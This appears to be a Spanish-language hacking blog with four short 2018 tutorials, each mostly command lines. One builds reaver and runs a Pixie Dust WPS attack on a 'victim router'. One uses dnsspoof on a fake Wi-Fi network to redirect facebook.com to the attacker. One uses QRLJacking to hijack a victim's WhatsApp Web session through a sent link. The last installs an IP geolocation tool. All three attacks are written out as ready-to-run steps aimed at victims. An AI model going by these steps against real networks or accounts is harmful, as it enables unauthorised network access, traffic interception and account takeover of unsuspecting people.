viernes, 29 de junio de 2018

script para ataque PixieDust para Kali


Hola amigos.

El día de hoy, aprenseremos como instalar un script que realiza el ataque Pixie Dust, destinado a AP que tienen WPS activado y que sean vulnerables a este ataque.

En primer lugar, instalamos las dependencias.

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps
Descargamos
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
Nos metemos en el directorio
cd reaver-wps-fork-t6x/
Nos metemos en el directorio src
cd src/

Y compilamos con la siguiente secuencia:

./configure

make



make install



Ponemos la tarjeta de red en modo monitor:



airmon-ng start wlan0



Buscamos A.P. con WPS activado:



wash -i mon0



la tarjeta en modo monitor puede ser mon0 o wlan0mon, así que si es wlan0mon, ponéis wash -i wlan0mon



Lanzamos el ataque:



reaver -i mon0 -b BSSID_ROUTER_VICTIMA -c CANAL_ROUTER_VICTIMA -vvv -K 1 -f






sábado, 23 de junio de 2018

dnsspoof + wifi falsa


Hola amigos.

En esta ocasión, vamos a conseguir que, en una red wifi falsa que hagamos, redirijamos las peticiones dns a nuestro equipo atacante.

En primer lugar, si no lo has hecho, crea una red wifi falsa como indico aquí:


ahora usamos dnsspoof

Creamos el archivo dns_spoof.txt

10.0.0.1<TAB>facebook.com
10.0.0.1<TAB>www.facebook.com

Guardamos y cerramos

Ahora

dnsspoof -i at0 -f dns_spoof.txt

Y así de sencillo.

viernes, 8 de junio de 2018

Hackear Whatsapp QRLJacking

Hola amigos.
Hoy, vamos a aprender a hackear whatsapp web (y otros servicios con tokens QRCode).
En primer lugar, nos descargaremos


Nos metemos el el directorio

cd QRLJacking

cd QrlJacking-Framework

Instalamos los requerimientos:

pip install -r requirements.txt

Arrrancamos

Python QRLJacker.py



Seleccionamos Chat Aplicattions



Seleccionamos whatsapp

Ahora, ponemos el puerto para poner a la escucha, pondré el puerto 80, que es el puerto por defecto de http

Se nos abrirá una ventana del navegador:



Le enviamos la dirección a la víctima, en mi caso http://192.168.1.131 y, en lo abrirá



En cuanto la víctima, haga sesión en whatsapp web, nos saldrá, en nuestro navegador, su sesión.

Eso sí, tenemos que estar pendientes, porque cuando salga que hay que recargar la imagen, debemos recargarla porque si no, la víctima no podrá abrir la sesión.


sábado, 2 de junio de 2018

Geolocalizar IP en Kali Linux

Hola amigos:

Hoy, os traigo un script que nos permite geolocalizar una IP.

En primer lugar, descargaremos de github


Nos metemos en el directorio

cd IPGeoLocation

Ahora, instalamos los requerimientos

pip3 install -r requirements.txt –user

Si por casualidad, no tuvieses instalado pip3:
  • apt-get install python3-setuptools
  • easy_install3 pip
  • pip3 install -r requirements.txt

Le damos permisos de ejecución

chmod +x ipgeolocation.py

Basta con poner

./ipgeolocation.py

para ejecutar.

Algunas de las opciones son

  • ./ipgeolocation.py -m : muestra nuestra geolocalización.
  • ./ipgeolocation.py -t IP_OBJETIVO: muestra la geolocalización de la IP_OBJETIVO
  • ./ipgeolocation.py -t dominio.com: muestra la geolocalización de dominio.com
  • ./ipgeolocation.py -t IP -x IP_PROXY: Para usar un proxy.
  • ./ipgeolocation.py -t IP_OBJETIVO/DOMINIO.COM -u “USER_AGENT” cambia el user_agent